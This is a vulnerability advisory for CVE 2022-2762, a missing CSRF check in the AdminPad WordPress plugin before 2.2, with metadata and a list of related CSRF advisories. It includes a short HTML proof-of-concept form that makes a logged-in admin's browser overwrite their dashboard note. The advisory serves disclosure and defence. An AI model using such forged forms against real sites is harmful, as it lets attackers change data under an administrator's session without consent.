AdminPad < 2.2 – Note Update via CSRF | CVE 2022-2762 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when updating admin's note, allowing attackers to make a logged in admin update their notes via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/index.php" method="POST">
      <input type="hidden" name="adminpad_content" value="test" />
      <input type="hidden" name="adminpad_save" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Notes are displayed in the Dashboard (/wp-admin/index.php)

Affects Plugins

Fixed in 2.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

cf0b3893-3283-46d6-a497-f3110a35d42a

Timeline

Publicly Published

2022-09-29 (about 3 years ago)

Added

2022-09-29 (about 3 years ago)

Last Updated

2022-09-29 (about 3 years ago)

Other

Published

Title

Published

2024-04-11

Title

Convert Post Types <= 1.4 - Cross-Site Request Forgery

Published

2025-09-22

Title

BP Disable Activation Reloaded <= 1.2.1 - Cross-Site Request Forgery

Published

2023-09-13

Title

10Web Map Builder for Google Maps < 1.0.74 - Cross-Site Request Forgery to Notice Dismissal

Published

2023-11-06

Title

ImageMapper <= 1.2.6 - Settings Update via CSRF

Published

2025-03-24

Title

WordPress SQL Backup <= 3.5.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting